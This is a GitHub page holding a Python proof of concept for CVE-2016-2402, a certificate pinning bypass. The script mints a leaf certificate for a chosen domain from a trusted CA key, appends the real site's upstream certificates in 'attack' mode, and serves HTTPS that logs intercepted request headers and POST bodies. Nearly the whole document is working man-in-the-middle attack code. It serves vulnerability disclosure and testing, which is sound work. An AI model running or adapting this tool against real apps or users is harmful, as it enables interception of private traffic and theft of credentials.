-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathcert-pinning-flaw-poc.py
executable file
·144 lines (116 loc) · 5.7 KB
/
cert-pinning-flaw-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/python3
# John Kozyrakis
import tempfile
from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl
import argparse
import logging
import os
import sys
from OpenSSL import crypto, SSL
import socket
class ServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.debug("intercepted GET request. If you see data from the client here, the attack worked.")
self.log_request()
logging.debug(self.headers)
def do_POST(self):
logging.debug("")
logging.debug(
"intercepted POST request to %s. If you see data from the client here, the attack worked." % self.path)
self.log_request()
if "tracking" not in self.path:
logging.debug(self.headers)
length = int(self.headers['Content-Length'])
content = self.rfile.read(length)
logging.debug(content)
def gen_malicious_chain(domain):
# load CA certificate and key
trusted_ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM,
open(os.path.join(os.path.dirname(__file__), CA_CERT)).read())
trusted_ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM,
open(os.path.join(os.path.dirname(__file__), CA_KEY)).read())
# generate a new end-entity certificate for a given domain signed by our trusted CA
[(end_entity_cert, end_entity_key)] = generate_end_entity_cert(domain, trusted_ca_cert, trusted_ca_key)
tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, end_entity_cert))
tempMaliciousChainFile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, end_entity_key))
logging.debug("Generated end-entity cert & key, signed by the provided CA. Adding these to the malicious chain")
upstream_certs = get_upstream_certs(domain, 443)
logging.info("Retrieved the certificates used by the real %s (%s in total)" % (domain, len(upstream_certs)))
if args.mode == 'attack':
for cert in upstream_certs:
tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
logging.info("The upstream certificates WILL be added to the malicious client chain")
else:
logging.info("The upstream certificates will NOT be added to the malicious client chain")
def generate_end_entity_cert(domain, cacert, cakey):
skey = crypto.PKey()
skey.generate_key(crypto.TYPE_RSA, 2048)
scert = crypto.X509()
scert.get_subject().CN = domain # This is where the domain fits
scert.set_issuer(cacert.get_subject())
scert.gmtime_adj_notBefore(0)
scert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
scert.set_serial_number(0)
scert.set_pubkey(skey)
scert.sign(cakey, "sha1")
return [(scert, skey)]
def get_upstream_certs(host, port):
context = SSL.Context(SSL.SSLv23_METHOD)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection = SSL.Connection(context, s)
connection.connect((host, port))
try:
connection.do_handshake()
except SSL.WantReadError:
logging.error("Timeout")
cleanup()
return connection.get_peer_cert_chain()
def cleanup():
tempMaliciousChainFile.close()
logging.error("Exiting")
sys.exit(1)
logging.basicConfig(level=logging.DEBUG)
logging.info("Certificate Pinning bypass POC - CVE-2016-2402 - https://koz.io/pinning-cve-2016-2402")
parser = argparse.ArgumentParser(
prog='Certificate Pinning bypass POC',
description='''This utility will set up a HTTPS server that uses a malicious certificate chain for a specific domain.
If traffic of a vulnerable app is redirected to this server, certificate pinning for that domain will bypassed.
See https://koz.io/pinning-cve-2016-2402 for more details.''',
epilog='''@ikoz - John Kozyrakis''')
parser.add_argument("-d", "--domain", help="Domain name to be intercepted", required=True)
parser.add_argument("-p", "--port", help="Web server port number", type=int, default=443)
parser.add_argument("-c", "--cacert", help="CA certificate that the host system trusts (PEM)", default="CA_CERT.pem")
parser.add_argument("-k", "--cakey", help="Private key of CA that the host system trusts (PEM)", default="CA_KEY.pem")
parser.add_argument("-m", "--mode", help="Add upstream certificates to chain (or not)",
choices=['attack', 'no-attack'], required=True)
parser.add_argument("-v", "--verbose", help="increase output verbosity",
action="store_true")
args = parser.parse_args()
logging.info("Will intercept domain %s" % args.domain)
logging.info("Will use CA certificate %s with private key %s" % (args.cacert, args.cakey))
CA_CERT = args.cacert # certificate of CA that the host system trusts
CA_KEY = args.cakey # private key of CA that the host system trusts
if os.path.isfile(CA_CERT) is False:
logging.error("CA_CERT %s is not a valid file" % CA_CERT)
cleanup()
if os.path.isfile(CA_KEY) is False:
logging.error("CA_KEY %s is not a valid file" % CA_KEY)
cleanup()
tempMaliciousChainFile = tempfile.NamedTemporaryFile()
gen_malicious_chain(args.domain)
logging.info(
"Starting web server - listening at port %s. Redirecting traffic for %s to this server will bypass any pinning and "
"show the requests here" % (
args.port, args.domain))
logging.info("Use Ctrl+C to stop the server")
try:
httpd = HTTPServer(("localhost", args.port), ServerHandler)
except PermissionError:
logging.error("PermissionError: Cannot start server on port %s. Please use sudo or a port >1024" % args.port)
cleanup()
except:
logging.exception("Exception")
cleanup()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=tempMaliciousChainFile.name, server_side=True)
httpd.serve_forever()